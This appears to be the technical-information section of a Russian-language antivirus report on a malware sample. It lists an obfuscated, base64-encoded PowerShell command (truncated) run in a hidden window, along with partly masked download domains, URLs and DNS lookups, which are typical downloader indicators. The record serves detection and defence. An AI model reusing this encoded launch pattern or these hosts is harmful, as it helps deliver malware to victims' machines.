Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAUwBoAEUATABMAGkAZABbADEAXQArACQAUwBIAGUAbABMAEkAZABbADEAMwBdACsAJwBYACcAKQAgACgAbgBFAHcALQBPAEIASgBFAGMAdAAgAEkATwAuAEMAbwBtAFAAUgBFAFMAUwBpAG8ATgAuAEQAZQBGAGwAYQBUAEUAcwBUAF...
- 'hy##k.eu':80
- 'cl###icink.biz':80
- 'ra##ev.org':80
- 'in##pmo.com':80
- 'wa##ey.org':80
- http://hy##k.eu/iByAcPe/
- http://cl###icink.biz/lXyzJa/
- http://www.cl###icink.biz/lXyzJa/
- http://in##pmo.com/qKE3/
- http://wa##ey.org/YXtlJ/
- DNS ASK hy##k.eu
- DNS ASK cl###icink.biz
- DNS ASK ra##ev.org
- DNS ASK in##pmo.com
- DNS ASK wa##ey.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAUwBoAEUATABMAGkAZABbADEAXQArACQAUwBIAGUAbABMAEkAZABbADEAMwBdACsAJwBYACcAKQAgACgAbgBFAHcALQBPAEIASgBFAGMAdAAgAEkATwAuAEMAbwBtAFAAUgBFAFMAUwBpAG8ATgAuAEQAZQBGAGwAYQBUAEUAcwBUAF...' (со скрытым окном)